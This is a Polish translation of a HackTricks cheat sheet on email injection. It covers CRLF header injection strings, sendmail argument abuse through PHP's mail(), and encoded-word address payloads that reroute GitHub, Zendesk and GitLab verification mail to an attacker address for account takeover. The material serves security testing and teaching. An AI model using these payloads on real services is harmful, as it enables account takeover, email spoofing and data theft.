Email Injections

Reading time: 7 minutes

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks

Wstrzykiwanie w wysłanym e-mailu

Wstrzykiwanie Cc i Bcc po argumencie nadawcy

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

Wiadomość zostanie wysłana do kont odbiorcy i odbiorcy1.

Wstrzyknij argument

From:sender@domain.com%0ATo:attacker@domain.com

Wiadomość zostanie wysłana do oryginalnego odbiorcy oraz konta atakującego.

Wstrzykiwanie argumentu Subject

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

Fałszywy temat zostanie dodany do oryginalnego tematu, a w niektórych przypadkach go zastąpi. Zależy to od zachowania usługi pocztowej.

Zmień treść wiadomości

Wstrzyknij dwa znaki nowej linii, a następnie napisz swoją wiadomość, aby zmienić treść wiadomości.

From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.

Wykorzystanie funkcji mail() w PHP

bash
# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}

5. parametr ($additional_parameters)

Ta sekcja będzie oparta na tym, jak nadużyć ten parametr, zakładając, że atakujący go kontroluje.

Ten parametr zostanie dodany do linii poleceń, którą PHP użyje do wywołania binarnego sendmail. Zostanie jednak oczyszczony za pomocą funkcji escapeshellcmd($additional_parameters).

Atakujący może wstrzyknąć dodatkowe parametry dla sendmail w tym przypadku.

Różnice w implementacji /usr/sbin/sendmail

Interfejs sendmail jest dostarczany przez oprogramowanie MTA do obsługi poczty (Sendmail, Postfix, Exim itp.) zainstalowane na systemie. Chociaż podstawowa funkcjonalność (taka jak parametry -t -i -f) pozostaje taka sama z powodów zgodności, inne funkcje i parametry znacznie się różnią w zależności od zainstalowanego MTA.

Oto kilka przykładów różnych stron podręcznika poleceń dla interfejsu sendmail:

  • Sendmail MTA: http://www.sendmail.org/~ca/email/man/sendmail.html
  • Postfix MTA: http://www.postfix.org/mailq.1.html
  • Exim MTA: https://linux.die.net/man/8/eximReferences

W zależności od pochodzenia binarnego sendmail odkryto różne opcje, aby je nadużyć i wyciekować pliki lub nawet wykonywać dowolne polecenia. Sprawdź jak w https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html

Wstrzykiwanie w nazwie e-maila

caution

Zauważ, że jeśli uda ci się założyć konto w usłudze z dowolną nazwą domeny (taką jak Github, Gitlab, CloudFlare Zero trust...) i zweryfikować je, otrzymując e-mail weryfikacyjny na swój adres e-mail, możesz uzyskać dostęp do wrażliwych lokalizacji firmy ofiary.

Ignorowane części e-maila

Symbole: +, - i {} w rzadkich przypadkach mogą być używane do tagowania i są ignorowane przez większość serwerów e-mail.

  • Np. john.doe+intigriti@example.com → john.doe@example.com

Komentarze w nawiasach () na początku lub na końcu również będą ignorowane.

  • Np. john.doe(intigriti)@example.com → john.doe@example.com

Ominięcie białej listy

https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0

Cytaty

https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0

IP

Możesz również używać adresów IP jako nazw domenowych w nawiasach kwadratowych:

  • john.doe@[127.0.0.1]
  • john.doe@[IPv6:2001:db8::1]

Kodowanie e-maili

Jak wyjaśniono w tych badaniach, nazwy e-maili mogą również zawierać zakodowane znaki:

  • PHP 256 overflow: Funkcja PHP chr będzie nadal dodawać 256 do znaku, aż stanie się dodatnia, a następnie wykona operację %256.
  • String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @

tip

Celem tego triku jest zakończenie wstrzyknięciem takim jak RCPT TO:<"collab@psres.net>collab"@example.com>
co spowoduje wysłanie e-maila weryfikacyjnego na inny adres e-mail niż oczekiwany (w ten sposób wprowadza się inny adres e-mail wewnątrz nazwy e-maila i łamie składnię podczas wysyłania e-maila).

Różne kodowania:

bash
# Format
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com

# =? -> Start of encode
# utf-8 -> encoding used
# ? -> separator
# q -> type of encoding
# ? -> separator
# =41=42=43 -> Hex encoded data
# ?= end of encoding

# Other encodings, same example:
# iso-8859-1
=?iso-8859-1?q?=61=62=63?=hi@example.com
# utf-8
=?utf-8?q?=61=62=63?=hi@example.com
# utf-7
=?utf-7?q?<utf-7 encoded string>?=hi@example.com
# q encoding + utf-7
=?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
# base64
=?utf-8?b?QUJD?=hi@example.com
# bas64 + utf-7
=?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
#punycode
x@xn--svg/-9x6 → x@<svg/

Payloady:

  • Github: =?x?q?collab=40psres.net=3e=00?=foo@example.com
  • Zauważ zakodowane @ jako =40, zakodowane > jako =3e i null jako =00
  • Wyśle wiadomość weryfikacyjną na collab@psres.net
  • Zendesk: "=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com
  • Ta sama sztuczka co wcześniej, ale dodając zwykły cudzysłów na początku i zakodowany cudzysłów =22 przed zakodowanym @, a następnie otwierając i zamykając cudzysłowy przed następnym adresem e-mail, aby naprawić składnię używaną wewnętrznie przez Zendesk
  • Wyśle wiadomość weryfikacyjną na collab@psres.net
  • Gitlab: =?x?q?collab=40psres.net_?=foo@example.com
  • Zauważ użycie podkreślenia jako spacji do oddzielenia adresu
  • Wyśle wiadomość weryfikacyjną na collab@psres.net
  • Punycode: Używając Punycode, możliwe było wstrzyknięcie tagu <style w Joomla i nadużycie go do kradzieży tokenu CSRF za pomocą eksfiltracji CSS.

Narzędzia

  • Istnieje skrypt Burp Suite Turbo Intruder, aby fuzzować tego rodzaju kombinacje, aby spróbować zaatakować formaty e-maili. Skrypt ma już potencjalnie działające kombinacje.
  • Możliwe jest również użycie Hackvertor do stworzenia ataku dzielącego e-mail

Inne luki

https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0

SSO stron trzecich

XSS

Niektóre usługi, takie jak github lub salesforce, pozwalają na stworzenie adresu e-mail z ładunkami XSS. Jeśli możesz użyć tych dostawców do logowania się do innych usług i te usługi nie sanitizują poprawnie e-maila, możesz spowodować XSS.

Przejęcie konta

Jeśli usługa SSO pozwala na utworzenie konta bez weryfikacji podanego adresu e-mail (jak salesforce) i następnie możesz użyć tego konta do logowania się w innej usłudze, która ufa salesforce, możesz uzyskać dostęp do dowolnego konta.
Należy zauważyć, że salesforce wskazuje, czy podany e-mail był weryfikowany, ale aplikacja powinna uwzględnić te informacje.

Odpowiedź

Możesz wysłać e-mail używając From: company.com i Replay-To: attacker.com, a jeśli jakakolwiek automatyczna odpowiedź zostanie wysłana z powodu tego, że e-mail został wysłany z wewnętrznego adresu, atakujący może być w stanie otrzymaćodpowiedź.

Wskaźnik twardych odbić

Niektóre usługi, takie jak AWS, implementują próg znany jako Wskaźnik twardych odbić, zazwyczaj ustawiony na 10%. To krytyczna metryka, szczególnie dla usług dostarczania e-maili. Gdy ten wskaźnik zostanie przekroczony, usługa, taka jak usługa e-mailowa AWS, może zostać zawieszona lub zablokowana.

Twarde odbicie odnosi się do e-maila, który został zwrócony do nadawcy, ponieważ adres odbiorcy jest nieprawidłowy lub nieistniejący. Może to wystąpić z różnych powodów, takich jak e-mail wysłany na nieistniejący adres, domenę, która nie jest rzeczywista, lub odmowa serwera odbiorcy przyjęcia e-maili.

W kontekście AWS, jeśli wyślesz 1000 e-maili, a 100 z nich skutkuje twardymi odbiciami (z powodu takich powodów jak nieprawidłowe adresy lub domeny), oznacza to wskaźnik twardych odbić na poziomie 10%. Osiągnięcie lub przekroczenie tego wskaźnika może spowodować zablokowanie lub zawieszenie możliwości wysyłania e-maili przez AWS SES (Simple Email Service).

Ważne jest, aby utrzymać niski wskaźnik twardych odbić, aby zapewnić nieprzerwaną usługę e-mailową i utrzymać reputację nadawcy. Monitorowanie i zarządzanie jakością adresów e-mail w twoich listach mailingowych może znacznie pomóc w osiągnięciu tego celu.

Aby uzyskać bardziej szczegółowe informacje, można odwołać się do oficjalnej dokumentacji AWS dotyczącej obsługi odbić i skarg AWS SES Bounce Handling.

Odnośniki

tip

Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie HackTricks